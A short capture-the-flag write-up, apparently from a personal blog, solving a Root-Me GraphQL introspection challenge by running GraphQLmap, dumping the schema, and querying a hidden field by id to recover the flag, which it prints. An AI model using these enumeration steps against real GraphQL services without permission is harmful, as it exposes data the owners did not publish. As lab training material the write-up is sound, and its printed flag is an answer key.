← Back
GraphQL-Introspection | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

Here, we can see there is a basic GraphQL-Introspection we can execute. I’ll use this tool GraphQLmap.

execute this command graphqlmap -u http://challenge01.root-me.org:59077/rocketql -v --method POST

and then, dump_via_introspection.

graphqlmap image

Okay, let’s see what is found inside IAmNotHere

GraphQLmap > {IAmNotHere(very_long_id:0){very_long_value}}
None
{
    "data": {
        "IAmNotHere": null
    {
{

Fine, next value:

GraphQLmap > {IAmNotHere(very_long_id:1){very_long_value}}
None
{
    "data": {
        "IAmNotHere": [
            {
                "very_long_value": "n"
            {
        ]
    {
{

Interesting, let’s auto this using burp Final image

We are getting: nothingherelol, and then, we can see the flag: RM{1ntr0sp3ct1On_1s_us3ful}

Flag: RM{1ntr0sp3ct1On_1s_us3ful}